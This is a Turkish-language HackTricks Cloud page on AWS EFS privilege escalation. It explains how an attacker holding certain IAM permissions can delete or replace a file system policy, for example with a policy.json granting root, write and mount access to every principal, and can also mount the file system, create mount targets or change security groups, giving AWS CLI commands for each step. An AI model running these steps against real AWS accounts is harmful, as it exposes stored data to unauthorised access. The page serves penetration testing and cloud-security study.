AWS - EFS Privesc

AWS Hacking'i öğrenin ve pratik yapın:HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE) GCP Hacking'i öğrenin ve pratik yapın: HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'i takip edin.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

EFS

EFS hakkında daha fazla bilgi için:

AWS - EFS Enum

Bir EFS'yi bağlamak için, EFS'nin açık olduğu bir alt ağda olmanız ve ona erişiminizin olması gerektiğini unutmayın (güvenlik grupları). Bu gerçekleşiyorsa, varsayılan olarak her zaman onu bağlayabileceksiniz, ancak IAM politikalarıyla korunuyorsa, ona erişmek için burada belirtilen ek izinlere sahip olmanız gerekir.

`elasticfilesystem:DeleteFileSystemPolicy`|`elasticfilesystem:PutFileSystemPolicy`

Bu izinlerden herhangi biriyle bir saldırgan dosya sistemi politikasını değiştirerek size erişim verebilir veya sadece silerek varsayılan erişimi sağlayabilir.

Politikayı silmek için:

aws efs delete-file-system-policy \
--file-system-id <value>

Değiştirmek için:

aws efs put-file-system-policy --file-system-id <fs-id> --policy file:///tmp/policy.json

// Give everyone trying to mount it read, write and root access
// policy.json:
{
"Version": "2012-10-17",
"Id": "efs-policy-wizard-059944c6-35e7-4ba0-8e40-6f05302d5763",
"Statement": [
{
"Sid": "efs-statement-2161b2bd-7c59-49d7-9fee-6ea8903e6603",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": [
"elasticfilesystem:ClientRootAccess",
"elasticfilesystem:ClientWrite",
"elasticfilesystem:ClientMount"
],
"Condition": {
"Bool": {
"elasticfilesystem:AccessedViaMountTarget": "true"
}
}
}
]
}

`elasticfilesystem:ClientMount|(elasticfilesystem:ClientRootAccess)|(elasticfilesystem:ClientWrite)`

Bu izinle bir saldırgan EFS'yi monte edebilir. Eğer yazma izni, EFS'yi monte edebilen herkes için varsayılan olarak verilmemişse, yalnızca okuma erişimine sahip olacaktır.

sudo mkdir /efs
sudo mount -t efs -o tls,iam  <file-system-id/EFS DNS name>:/ /efs/

Ekstra izinler elasticfilesystem:ClientRootAccess ve elasticfilesystem:ClientWrite, dosya sistemi monte edildikten sonra yazmak ve bu dosya sistemine root olarak erişmek için kullanılabilir.

Olası Etki: Dosya sisteminde hassas bilgileri bulma yoluyla dolaylı yetki yükseltme.

`elasticfilesystem:CreateMountTarget`

Eğer bir saldırgan alt ağda EFS'nin hiçbir montaj hedefi yoksa, bu yetki ile kendi alt ağında bir tane oluşturabilir.

# You need to indicate security groups that will grant the user access to port 2049
aws efs create-mount-target --file-system-id <fs-id> \
--subnet-id <value> \
--security-groups <value>

Potansiyel Etki: Dosya sisteminde hassas bilgilerin bulunmasıyla dolaylı yetki yükseltme.

`elasticfilesystem:ModifyMountTargetSecurityGroups`

Bir saldırganın EFS'nin kendi alt ağında bir montaj hedefi bulduğu ancak hiçbir güvenlik grubunun trafiğe izin vermediği bir senaryoda, seçilen güvenlik gruplarını değiştirerek bunu değiştirebilir:

aws efs modify-mount-target-security-groups \
--mount-target-id <value> \
--security-groups <value>

Potansiyel Etki: Dosya sisteminde hassas bilgilerin bulunmasıyla dolaylı privesc.

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'i takip edin.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

PreviousAWS - ECS Privesc NextAWS - Elastic Beanstalk Privesc

Last updated 3 days ago